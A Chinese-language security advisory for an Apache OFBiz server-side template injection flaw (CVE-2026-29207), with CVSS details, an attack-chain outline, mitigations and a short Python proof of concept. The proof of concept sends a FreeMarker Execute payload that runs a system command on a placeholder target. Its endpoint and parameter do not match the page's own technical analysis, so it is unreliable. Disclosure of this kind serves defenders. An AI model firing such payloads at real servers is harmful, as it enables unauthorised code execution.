CVE-2026-29207 CVSS 6.5 中危

CVE-2026-29207 Apache OFBiz模板注入漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29207

漏洞类型

服务器端模板注入 (SSTI)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache OFBiz

漏洞概述

Apache OFBiz在24.09.06之前的版本中存在模板引擎特殊元素不当中立化漏洞（SSTI）。由于系统未正确过滤用户输入，未经身份认证的远程攻击者可利用此漏洞，通过网络发送特制恶意请求。当服务器解析这些请求时，将执行攻击者注入的模板代码，导致敏感信息泄露或数据完整性受损。官方已在24.09.06版本中修复此问题，并调整了权限设置，建议用户立即升级以消除风险。

技术细节

该漏洞属于典型的服务器端模板注入（SSTI）。其根本原因在于Apache OFBiz在处理特定数据资源类型（特别是FTL类型）时，未能对用户提供的输入进行充分的安全过滤或沙箱隔离。攻击者可以利用CVSS向量中显示的无需认证（PR:N）和低攻击复杂度（AC:L）特性，直接向易受攻击的接口发送包含恶意FreeMarker表达式的HTTP请求。当后端服务尝试渲染这些模板时，恶意代码被执行。尽管CVSS评分将影响限制为低（C:L/I:L），但此类漏洞在特定配置下可能导致更严重的后果。此次修复重点在于移除对`dataTemplateTypeId = "FTL"`的支持以及限制"Ecommerce Customer"组的内容管理权限，证实了漏洞点位于这些功能模块中。

攻击链分析

STEP 1

侦察

攻击者识别互联网上运行Apache OFBiz且版本低于24.09.06的目标系统。

STEP 2

漏洞利用

攻击者构造包含恶意FreeMarker表达式（SSTI Payload）的HTTP请求，发送至目标系统的相关接口（如Data Resource处理接口）。

STEP 3

代码执行

目标服务器接收到请求后，解析模板引擎中的特殊元素。由于未正确过滤，服务器执行了攻击者注入的恶意代码。

STEP 4

达成影响

攻击者成功获取服务器敏感信息（低机密性影响）或篡改数据（低完整性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://target-ip:port/webtools/control/fingerprint"

# FreeMarker payload to execute a command (e.g., id)
# This payload uses Execute class to run system commands
payload = "${'freemarker.template.utility.Execute'?new()('id')}"

# Send the malicious request
response = requests.get(target_url, params={"dataResourceId": payload})

# Check result
if response.status_code == 200:
    print("[+] Exploit successful!")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Exploit failed.")

影响范围

Apache OFBiz < 24.09.06

防御指南

临时缓解措施

如果无法立即升级，建议限制对相关内容管理接口的网络访问权限（如通过WAF或防火墙规则），并严格审查用户权限，确保非管理员用户（如Ecommerce Customer组）不具备内容管理能力。同时，排查并清理数据库中可能存在的恶意FTL模板记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表